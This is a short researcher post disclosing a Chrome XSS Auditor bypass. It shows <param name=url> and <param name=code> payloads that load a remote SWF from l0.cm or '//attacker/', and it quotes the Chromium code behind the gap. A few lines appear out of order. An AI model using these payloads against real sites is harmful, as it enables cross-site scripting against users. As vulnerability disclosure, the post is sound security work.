I just found an XSS Auditor bypass by accident when I read Chromium's code for the another reason.
In this short post, I'd like to share this bypass. I confirmed that it works on Chrome Canary 57.
I have already reported here: https://bugs.chromium.org/p/chromium/issues/detail?id=676992
The bypass is:
<param name=url value=https://l0.cm/xss.swf>
Also it works:
<param name=code value=https://l0.cm/xss.swf>
if (url.isEmpty() && urlParameter.isEmpty() &&
(equalIgnoringCase(name, "src") || equalIgnoringCase(name, "movie") ||
equalIgnoringCase(name, "code") || equalIgnoringCase(name, "url")))
urlParameter = stripLeadingAndTrailingHTMLSpaces(p->value());
<param name="src" value="//attacker/xss.swf"> and
<param name="movie" value="//attacker/xss.swf"> are blocked by XSS Auditor. But I noticed that
That's it. I wrote about XSS Auditor bypass using
<param>. Thanks for reading!